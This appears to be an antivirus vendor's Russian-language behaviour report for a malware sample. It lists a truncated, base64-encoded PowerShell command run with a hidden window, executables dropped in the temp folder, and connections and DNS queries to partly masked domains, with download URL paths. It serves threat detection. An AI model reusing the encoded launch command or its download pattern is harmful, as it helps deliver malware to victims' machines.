Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAMwAzAHAAMgAxAD0AJwBXADEAdgBoAHUANABtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAYABVAFIAaQBUAFkAUABSAE8AdABPAGAAYwBgAG8ATAAiACAAPQAgAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1299987.cvr
- %TEMP%\wmqe.exe
- %TEMP%\wmqe.exe
- 'en####oftware.com':80
- 'en####oftware.com':443
- 'am####systems.com':80
- 'tf.###pyy120.com':80
- http://en####oftware.com/blogs/mtvqyqwl85094171/
- http://am####systems.com/wp/ZxXBfZxSe/
- http://tf.###pyy120.com/a/bdSRd/
- 'en####oftware.com':443
- DNS ASK en####oftware.com
- DNS ASK am####systems.com
- DNS ASK du#####mechanical.com
- DNS ASK pi###actinc.com
- DNS ASK tf.###pyy120.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAMwAzAHAAMgAxAD0AJwBXADEAdgBoAHUANABtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAYABVAFIAaQBUAFkAUABSAE8AdABPAGAAYwBgAG8ATAAiACAAPQAgAC... (со скрытым окном)